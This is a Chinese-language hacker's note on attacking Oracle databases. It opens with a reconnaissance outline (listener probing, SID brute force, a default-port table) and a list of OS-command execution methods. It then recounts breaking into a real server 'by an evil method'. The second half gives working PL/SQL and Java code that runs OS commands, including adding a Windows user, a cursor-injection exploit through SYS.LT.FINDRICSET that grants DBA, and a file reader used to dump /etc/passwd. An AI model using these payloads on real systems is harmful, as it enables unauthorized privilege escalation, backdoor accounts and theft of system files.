###qq:70381908###
为什么要关注 Oracle ?
因为Oracle 被大量企业所使用,有许多目标可以选择来渗透
许多企业都没有更新且有潜在的方险!
提权非常简单,容易拿到shell!!
读了blackhat paper 让我开始来研究Oracle
因为他只讲到一小部份 真正安全问题还有很广的
只是国内好像很少挖掘
因为遇到的环境不多
但是阿 Oracle 是 free download 呵呵
付费才可以upgrade
一般连接 Oracle 需要以下几个条件:
IP
PORT
SID
username/password
The Oracle listener default port is 1521
generally in the 1521-1540 range
扫描刺探不会跟你说用什么版本但新版的nmap 可以取得到一些,使用TNS packet可以解决这个问题
TNS packet 可以了解 oracle 版本
SID 刺探方式:
1.TNS listener directly
2.brute force for default sid
3.query other component 可能包含有SID
u/p 破解
提权方法:
提權 1 java function
Win32Exec
提權2 smbrelay
Run OS commands via sql injection in web applications
Run OS commands via create table
Run OS commands via dbms scheduler
Run OS commands via PL/SQL and Extproc
Run OS commands via Java
Run OS commands via Oracle Text
Run OS commands via PL/SQL Native (9i)
Run OS commands via PL/SQL Native (10g / 11g)
Run OS commands via alter system set events
还会陆续增加!!
此文只是我的research 的小笔记
另外介绍一款工具 可以做到部份唷 py写的
download: http://inguma.sourceforge.net/
demo:http://inguma.sourceforge.net/text/inguma_text.html
注:
Oracle default port list
| Oracle HTTP Server listen port / Oracle HTTP Server port | 80 | Oracle Application Server | Edit httpd.conf and restart OHS |
| Oracle Internet Directory(non-SSL) | 389 | Oracle Application Server | |
| Oracle HTTP Server SSL port | 443 | Oracle Application Server | Edit httpd.conf and restart OHS |
| Oracle Internet Directory(SSL) | 636 | Oracle Application Server | |
| Oracle Net Listener / Enterprise Manager Repository port | 1521 | Oracle Application Server / Oracle Database | Edit listener.ora and restart listener |
| Oracle Net Listener | 1526 | Oracle Database | Edit listener.ora and restart listener |
| Oracle Names | 1575 | Oracle Database | Edit names.ora and restart names server |
| Oracle Connection Manager (CMAN) | 1630 | Oracle Connection Manager | Edit cman.ora and restart Connection Manager |
| Oracle JDBC for Rdb Thin Server | 1701 | Oracle Rdb | |
| Oracle Intelligent Agent | 1748 | Oracle Application Server | snmp_rw.ora |
| Oracle Intelligent Agent | 1754 | Oracle Application Server | snmp_rw.ora |
| Oracle Intelligent Agent | 1808 | Oracle Application Server | snmp_rw.ora |
| Oracle Intelligent Agent | 1809 | Oracle Application Server | snmp_rw.ora |
| Enterprise Manager Servlet port SSL | 1810 | Oracle Enterprise Manager | |
| Oracle Connection Manager Admin (CMAN) | 1830 | Oracle Connection Manager (CMAN) | Edit cman.ora and restart Connection Manager |
| Enterprise ManagerAgent port | 1831 | Oracle Enterprise Manager | |
| Enterprise Manager RMI port | 1850 | Oracle Enterprise Manager | |
| Oracle XMLDB FTP Port | 2100 | Oracle Database | change dbms_xdb.cfg_update |
| Oracle GIOP IIOP | 2481 | Oracle Database | Edit listener.ora/init.ora and restart listener/database |
| Oracle GIOP IIOP for SSL | 2482 | Oracle Database | Edit listener.ora/init.ora and restart listener/database |
| Oracle OC4J RMI | 3201 | Oracle Application Server | |
| Oracle OC4J AJP | 3301 | Oracle Application Server | |
| Enterprise Manager Reporting port | 3339 | Oracle Application Server | Edit oem_webstage/oem.conf and restart OHS |
| Oracle OC4J IIOP | 3401 | Oracle Application Server | |
| Oracle OC4J IIOPS1 | 3501 | Oracle Application Server | |
| Oracle OC4J IIOPS2 | 3601 | Oracle Application Server | |
| Oracle OC4J JMS | 3701 | Oracle Application Server | |
| Oracle9iAS Web Cache Admin port | 4000 | Oracle Application Server | Webcache Admin GUI or webcache.xml |
| Oracle9iAS Web Cache Invalidation port | 4001 | Oracle Application Server | Webcache Admin GUI or webcache.xml |
| Oracle9iAS Web Cache Statistics port | 4002 | Oracle Application Server | Webcache Admin GUI or webcache.xml |
| Oracle Internet Directory(SSL) | 4031 | Oracle Application Server | |
| Oracle Internet Directory(non-SSL) | 4032 | Oracle Application Server | |
| OracleAS Certificate Authority (OCA) - Server Authentication | 4400 | Oracle Application Server | |
| OracleAS Certificate Authority (OCA) - Mutual Authentication | 4401 | Oracle Application Server | |
| Oracle HTTP Server SSL port | 4443 | Oracle Application Server | Edit httpd.conf and restart OHS |
| Oracle9iAS Web Cache HTTP Listen(SSL) port | 4444 | Oracle Application Server | Webcache Admin GUI or webcache.xml |
| Oracle TimesTen | 4662 | Oracle TimesTen | |
| Oracle TimesTen | 4758 | Oracle TimesTen | |
| Oracle TimesTen | 4759 | Oracle TimesTen | |
| Oracle TimesTen | 4761 | Oracle TimesTen | |
| Oracle TimesTen | 4764 | Oracle TimesTen | |
| Oracle TimesTen | 4766 | Oracle TimesTen | |
| Oracle TimesTen | 4767 | Oracle TimesTen | |
| Oracle Enterprise Manager Web Console | 5500 | Oracle Enterprise Manager Web | |
| iSQLPlus 10g | 5560 | Oracle i*SQLPlus | |
| iSQLPlus 10g | 5580 | Oracle i*SQLPlus RMI Port | |
| Oracle Notification Service request port | 6003 | Oracle Application Server | |
| Oracle Notification Service local port | 6100 | Oracle Application Server | |
| Oracle Notification Service remote port | 6200 | Oracle Application Server | |
| Oracle9iAS Clickstream Collector Agent | 6668 | Oracle Application Server | |
| Java Object Cache port | 7000 | Oracle Application Server | |
| DCM Java Object Cache port | 7100 | Oracle Application Server | |
| Oracle HTTP Server Diagnostic Port | 7200 | Oracle Application Server | |
| Oracle HTTP Server Port Tunneling | 7501 | Oracle Application Server | |
| Oracle HTTP Server listen port / Oracle HTTP Server port | 7777 | Oracle Application Server | Edit httpd.conf and restart OHS |
| Oracle9iAS Web Cache HTTP Listen(non-SSL) port | 7779 | Oracle Application Server | Webcache Admin GUI or webcache.xml |
| Oracle HTTP Server Jserv port | 8007 | Oracle Application Server | |
| OC4J Forms / Reports Instance | 8888 | Oracle Developer Suite | change dbms_xdb.cfg_update |
| OC4J Forms / Reports Instance | 8889 | Oracle Developer Suite | |
| Oracle Forms Server 6 / 6i | 9000 | Oracle Application Server | |
| Oracle SOAP Server | 9998 | Oracle Application Server | |
| OS Agent | 14000 | Oracle Application Server | |
| Oracle Times Ten | 15000 | Oracle Times Ten | |
| Oracle Times Ten | 15002 | Oracle Times Ten | |
| Oracle Times Ten | 15004 | Oracle Times Ten | |
| Log Loader | 44000 | Oracle Enterprise Manager |
这是两年前的一篇笔记。内容有删减。
先是通过某个邪恶的方法连接了oracle服务器......(过程略)
很快便连接上oracle服务器,此时发现:
1.连接后不是dba权限
2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限
3.运行SELECT UTL_HTTP.request('http://xxxxxxxxxxx/login.jsp') FROM dual 后发现oracle服务器不能连接网络。
幸运的是,
运行
create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;
成功!这个用户具有create proceduce权限。
此时马上想到创建java扩展执行命令:
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"/n";myReader.close();return str;} catch (Exception e){return e.toString();}}}
begin dbms_java.grant_permission('PUBLIC', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' );end;
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name 'LinxUtil.runCMD(java.lang.String) return String'
select * from all_objects where object_name like '%LINX%'
grant all on LinxRunCMD to public
select LinxRunCMD('cmd /c net user linx /add') from dual
但是在第一步就卡住了,服务器由于某种未知原因 不能创建java扩展!!
还好,我们还有UTL库可以利用:
create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is
fHandler UTL_FILE.FILE_TYPE;
buf varchar2(4000);
output varchar2(8000);
BEGIN
fHandler := UTL_FILE.FOPEN('UTL_FILE_DIR', filename, 'r');
loop
begin
utl_file.get_line(fHandler,buf);
DBMS_OUTPUT.PUT_LINE('Cursor: '||buf);
exception
when no_data_found then exit;
end;
output := output||buf||chr(10);
end loop;
UTL_FILE.FCLOSE(fHandler);
return output;
END;
UTL_FILE_DIR需要先用:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
指定目录。但运行后发现没有权限。只好想办法提权。
***************游标注射***************
老外写了N个pdf介绍这技术,我精简了代码:
DECLARE
MYC NUMBER;
BEGIN
MYC := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(MYC,'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO linxlinx_current_db_user'';commit;end;',0);
DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
BEGIN SYS.LT.FINDRICSET('.''||dbms_sql.execute( '||MYC||' )||'''')--','x'); END;
raise NO_DATA_FOUND;
EXCEPTION
WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('Cursor: '||MYC);
END;
运行后重新连接就有dba权限了,简单吧......
现在可以读取文件了:
CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS '/etc';
select LinxUTLReadfile('passwd') from dual
后面就简单了,不写了。
